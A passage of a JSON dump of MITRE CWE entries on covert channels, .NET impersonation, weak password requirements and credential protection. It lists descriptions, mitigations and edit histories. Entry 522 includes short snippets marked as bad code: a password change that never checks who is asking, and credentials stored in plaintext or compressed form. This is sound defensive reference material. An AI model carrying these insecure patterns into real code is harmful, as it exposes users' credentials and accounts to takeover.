data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Use spyware detection and removal software."},{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"514":{"attr":{"@_ID":"514","@_Name":"Covert Channel","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A covert channel is a path that can be used to transfer information in a way not intended by the system\'s designers.","Extended_Description":"Typically the system has not given authorization for the transmission and has no knowledge of its occurrence.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"SOAR Partial"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Covert Channel"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Notes":{"Note":{"#text":"A covert channel can be thought of as an emergent resource, meaning that it was not an originally intended resource, however it exists due the application\'s behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"515":{"attr":{"@_ID":"515","@_Name":"Covert Storage Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information.","Extended_Description":"Covert storage channels occur when out-of-band data is stored in messages for the purpose of memory reuse. Covert channels are frequently classified as either storage or timing channels. Examples would include using a file intended to hold only audit information to convey user passwords--using the name of a file or perhaps status bits associated with it that can be read by all users to signal the contents of the file. Steganography, concealing information in such a manner that no one but the intended recipient knows of the existence of the message, is a good example of a covert storage channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"514","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Covert storage channels may provide attackers with important information about the system in question."},{"Scope":["Integrity","Confidentiality"],"Impact":"Read Application Data","Note":"If these messages or packets are sent with unnecessary data contained within, it may tip off malicious listeners as to the process that created the message. With this information, attackers may learn any number of things, including the hardware platform, operating system, or algorithms used by the sender. This information can be of significant value to the user in launching further attacks."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that all reserved fields are set to zero before messages are sent and that no unnecessary information is included."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An excellent example of covert storage channels in a well known application is the ICMP error message echoing functionality. Due to ambiguities in the ICMP RFC, many IP implementations use the memory within the packet for storage or calculation. For this reason, certain fields of certain packets -- such as ICMP error packets which echo back parts of received messages -- may contain flaws or extra information which betrays information about the identity of the target operating system. This information is then used to build up evidence to decide the environment of the target. This is the first crucial step in determining if a given system is vulnerable to a particular flaw and what changes must be made to malicious code to mount a successful attack."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Storage"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Covert storage channel"}]},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"516":{"attr":{"@_ID":"516","@_Name":"DEPRECATED: Covert Timing Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-385.","Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): Covert Timing Channel","attr":{"@_Date":"2021-07-20"}}}},"520":{"attr":{"@_ID":"520","@_Name":".NET Misconfiguration: Use of Impersonation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks.","Extended_Description":".NET server applications can optionally execute using the identity of the user authenticated to the client. The intention of this functionality is to bypass authentication and access control checks within the .NET application code. Authentication is done by the underlying web server (Microsoft Internet Information Service IIS), which passes the authenticated token, or unauthenticated anonymous token, to the .NET application. Using the token to impersonate the client, the application then relies on the settings within the NTFS directories and files to control access. Impersonation enables the application, on the server running the .NET application, to both execute code and access resources in the context of the authenticated and authorized user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Operation","Description":"Run the application with limited privilege to the underlying operating and file system."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":".NET Misconfiguration: Impersonation","attr":{"@_Date":"2008-04-11"}}}},"521":{"attr":{"@_ID":"521","@_Name":"Weak Password Requirements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts.","Extended_Description":"Authentication mechanisms often rely on a memorized secret (also known as a password) to provide an assertion of identity for a user of a system. It is therefore important that this password be of sufficient complexity and impractical for an adversary to guess. The specific requirements around how complex a password needs to be depends on the type of system being protected. Selecting the correct password requirements and enforcing them through implementation are critical to the overall success of the authentication mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation","Note":"Not enforcing the password policy stated in a products design can allow users to create passwords that do not provide the necessary level of protection."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could easily guess user passwords and gain access user accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["A product\'s design should require adherance to an appropriate password policy. Specific password requirements depend strongly on contextual factors, but it is recommended to contain the following attributes:","See NIST 800-63B https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf Sections: 5.1.1, 10.2.1, and Appendix A for further information on password requirements."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":[{"xhtml:li":["Enforcement of a minimum and maximum length","Restrictions against password reuse","Restrictions against using common passwords","Restrictions against using contextual string in the password (e.g., user id, app name)"]},{"xhtml:li":[{"#text":"Complex passwords requiring mixed character sets (alpha, numeric, special, mixed case)","xhtml:ul":{"xhtml:li":["Increasing the range of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication.","Unfortunately, a complex password may be difficult to memorize, encouraging a user to select a short password or to incorrectly manage the password (write it down).","Another disadvantage of this approach is that it often does not result in a significant increases in overal password complexity due to people\'s predictable usage of various symbols."]}},{"#text":"Large Minimum Length (encouraging passphrases instead of passwords)","xhtml:ol":{"xhtml:li":["Increasing the number of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication.","A disadvantage of this approach is that selecting a good passphrase is not easy and poor passwords can still be generated. Some prompting may be needed to encourage long un-predictable passwords."]}},{"#text":"Randomly Chosen Secrets","xhtml:ol":{"xhtml:li":["Generating a password for the user can help make sure that length and complexity requirements are met, and can result in secure passwords being used.","A disadvantage of this approach is that the resulting password or passpharse may be too difficult to memorize, encouraging them to be written down."]}},{"#text":"Password Expiration","xhtml:ol":{"xhtml:li":["Requiring a periodic password change can reduce the time window that an adversary has to crack a password, while also limiting the damage caused by password exposures at other locations.","Password expiration may be a good mitigating technique when long complex passwords are not desired."]}}]}],"xhtml:p":"Depending on the threat model, the password policy may include several additional attributes."}}},{"Phase":"Architecture and Design","Description":"Consider a second\\n                 authentication factor beyond the password, which prevents the\\n                 password from being a single point of failure. See CWE-308 for\\n                 further information."},{"Phase":"Implementation","Description":"Consider implementing a password complexity meter to inform users when a chosen password meets the required attributes."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}},{"attr":{"@_External_Reference_ID":"REF-1053","@_Section":"Sections: 5.1.1, 10.2.1, and Appendix A"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"522":{"attr":{"@_ID":"522","@_Name":"Insufficiently Protected Credentials","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain access to user accounts and access sensitive data used by the user accounts."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an appropriate security mechanism to protect the credentials."},{"Phase":"Architecture and Design","Description":"Make appropriate use of cryptography to protect the credentials."},{"Phase":"Implementation","Description":"Use industry standards to protect the credentials (e.g. LDAP, keystore, etc.)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-56"},"Intro_Text":"This code changes a user\'s password.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_GET[\'user\'];$pass = $_GET[\'pass\'];$checkpass = $_GET[\'checkpass\'];if ($pass == $checkpass) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"SetUserPassword($user, $pass);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user\'s password and gain control of the victim\'s account."},{"attr":{"@_Demonstrative_Example_ID":"DX-57"},"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = prop.getProperty(\\"password\\");DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-58"},"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);...","xhtml:br":["","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system"},{"attr":{"@_Demonstrative_Example_ID":"DX-59"},"Intro_Text":"Both of these examples verify a password by comparing it to a stored compressed version.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"#text":"if (strcmp(compress(password), compressed_password)) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (passwd.Equals(compress(password), compressed_password)) {}return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""],"xhtml:i":"//Diagnostic Mode"}}}],"Body_Text":"Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0681","Description":"Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681"},{"Reference":"CVE-2000-0944","Description":"Web application password change utility doesn\'t check the original password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944"},{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"474"}},{"attr":{"@_CAPEC_ID":"50"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"551"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"523":{"attr":{"@_ID":"523","@_Name":"Unprotected Transport of Credentials","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"312","@_View_ID":"1000"}}]},"Background_Details":{"Background_Detail":"SSL (Secure Socket Layer) provides data confidentiality and integrity to HTTP. By encrypting HTTP messages, SSL protects from attackers eavesdropping or altering message contents."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Operation","System Configuration"],"Description":"Enforce SSL use for the login page or any page used to transmit user credentials or other sensitive information. Even if the entire site does not use SSL, it MUST use SSL for login. Additionally, to help prevent phishing attacks, make sure that SSL serves the login page. SSL allows the user to verify the identity of the server to which they are connecting. If the SSL serves login page, the user can be certain they are talking to the proper end system. A phishing attack would typically redirect a user to a site that does not have a valid trusted server certificate issued from an authorized supplier."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"102"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under 